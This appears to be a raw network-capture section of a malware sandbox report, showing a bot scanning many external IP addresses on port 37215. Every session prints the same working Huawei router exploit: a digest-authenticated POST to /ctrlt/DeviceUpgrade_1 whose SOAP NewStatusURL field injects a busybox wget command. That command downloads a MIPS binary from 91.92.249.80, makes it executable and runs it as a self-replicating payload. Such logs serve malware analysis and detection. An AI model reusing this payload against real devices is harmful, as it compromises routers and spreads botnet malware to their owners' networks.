                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1234192.168.2.2352492197.187.185.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326582909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1235192.168.2.234999841.235.210.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326589108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1236192.168.2.2354928197.180.172.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326617956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1237192.168.2.233512841.142.252.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326633930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1238192.168.2.2355528197.44.219.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326656103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1239192.168.2.2353034197.255.82.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326694965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1240192.168.2.2345822157.167.201.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326718092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1241192.168.2.236095687.113.185.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326725006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1242192.168.2.233789441.193.230.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326744080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1243192.168.2.234637441.68.164.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326761961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1244192.168.2.2337640197.151.152.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326776981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
